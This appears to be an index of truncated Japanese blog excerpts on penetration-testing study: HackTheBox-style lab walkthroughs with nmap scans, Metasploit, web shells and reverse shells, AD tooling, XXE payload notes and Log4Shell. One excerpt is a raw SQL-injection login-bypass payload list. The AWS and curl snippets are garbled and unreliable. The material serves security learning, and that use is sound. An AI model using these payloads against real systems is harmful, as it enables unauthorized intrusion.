/etc/squid/squid.conf # NTLM認証を有効化 auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp --DOMAIN=ドメイン名を入力 auth_param ntlm children 100 auth_param ntlm keep_alive on external_acl_type Grupos_AD ttl=10…

Tools スクリプトもしくはコンパイル済みのバイナリなどのツールが必要になる。 Tool Name Description(説明) PowerView/SharpView ADの状態を把握するためのツール。BloodHoundが行うデータの多くを収集するのに役に立つ。net*コマンドの代わりとして使用で…

▼期間 1年くらいで行けた。(ただし面倒くさい系の問題はかなり苦戦するもしくは、解けないのもある) ▼仕事 私はインフラエンジニアでVMwareのESXiとvCSAの設計構築とWindowsも設計構築、Linuxは構築～運用をしたことがあるレベル。 ※基本操作は覚えた位でセ…

大まかに Nmap Search exploit Directory Traversal Reverse Shell Nmap 22/tcp ssh 4.3 25/tcp smtp 80/tcp http 2.2.3 110/tcp pop3 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 111/tcp rpcbind #100000) 143/tcp imap 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 443/tcp s…

大まかに Nmap Dirb ブラウザーの開発者ツール Web Shell配置 Reverse shell root esc Nmap # sudo nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.75 実行結果 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 U…

大まかに Nmap Google Search Metasploit User Flag & Root Flag Nmap # sudo nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.3 ▼実行結果 PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4 | ftp-syst: | STAT: | …

大まかに Nmapスキャン Nmap Scriptを用いたスキャン Google Search MetaSploit Get System 1. Nmap Scan # sudo nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.4 # Nmap 7.93 scan initiated Fri May 12 00:52:11 2023 as: nmap -sC -sV -O -T4 -…

◆userフラグを回収 1.nmap === nmap-tcp.log 10.10.10.138Nmap scan report for 10.10.10.138Host is up, received echo-reply ttl 63 (0.26s latency).Scanned at 2022-09-17 13:40:32 JST for 37sNot shown: 998 filtered tcp ports (no-response)PORT STA…

◆Azure 移行手順 (Linux) 1.VMの一般化 ・以下のコマンドを実行 ※このコマンドを入力すると、マシン固有のファイルとデータが消えてしまうので注意。 # sudo waagent -deprovision ・Azure CLIにて以下の作業を行う。 ・以下のコマンドを使用して、プロビジ…

1.nmap -sC -sT -sV 10.10.10.134でポートスキャン。 ▼実行結果 +++ PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab…

1. nmapにてスキャンをするただしtcpの応答に対して何かフィルターをしてそうなので-sSを使用。そこでApache-Tomcatを使用しているのがわかった。 2. hacktrickを調べてみたところ興味深い記事にあたった。 <https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat>●Default credentials ※デフォルトクレデンシャル</https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat>…

SQLはデータベースへの問い合わせに使われる機能豊富な言語で、これらのSQLクエリはステートメントと呼ばれる。 ※SQLの構文は、大文字と小文字を区別しないことに注意 ◆SELECT ・データベースからデータを所得するために使用するSELECTクエリのタイプ。 #SEL…

◆いくつかのペイロード 1.最初のペイロード nameというENTITYを定義し、それにfeastという値を割り当てている。 ========================================================= ]> <userInfo> <firstName>falcon</firstName> <lastName>&name;</lastName> </userInfo> =====================================================…

◆XMLとは ・XML(eXtensible Markup Language)は、データの保存と転送に使用される マークアップ言語。 ・なぜXMLを使うのか？ 1.XMLはぷらっとフォームやプログラミング言語に依存しないため、どのような システムでも使用することができ、技術改新が起こっ…

◆ハッキングの基本的なフロー 1.偵察(Reconnnaissance) 2.スキャンニング(Scanning) 3.列挙(Enumeration) 4.アクセス権の取得(Gaining Access) 5.権限昇格(Privilege Elevetion) 6.アクセス権の維持(Maintaining Access) 7.痕跡の消去(cleaning Tracks) 大ま…

◆AWSと ・クラウドクラウドサービスをしします。 ・浜（地域）は独立しでレビューをする宿 取得得もます。 ◆AmazonS3 ・AmazonS3（Simple Storage Service）はあるの近型OSAP 。 ・POSはピグに固する。 ・POSAの概念をするに推化すると、ピハ キーゲストであ…

◆CVE-2021-44228 ・2021年12月9日に、Javaロギングパッケージ(log4j)に影響を与える ・log4jはリモートコードの実行を提供する。この攻撃は「log4jshell」と名付られた ・現在は、「log4jバージョン2.16.0」が公開されこの脆弱性にパッチが適用された ◆参照…

or 1=1or 1=1--or 1=1#or 1=1/*admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin' or '1'='1'/*admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin') or ('1'='1admin') or ('1'='1…

◆ペンテスターがカールを利用する理由 curlはWebページとAPIを使用することで使用する使用するアプリケーションラインサービス。げっぷなど）に送信できる。 ◆一般的な使い方 ＃カールはhttp://example.com ◆カールはデフォルトでは、GETを送信するため、POS…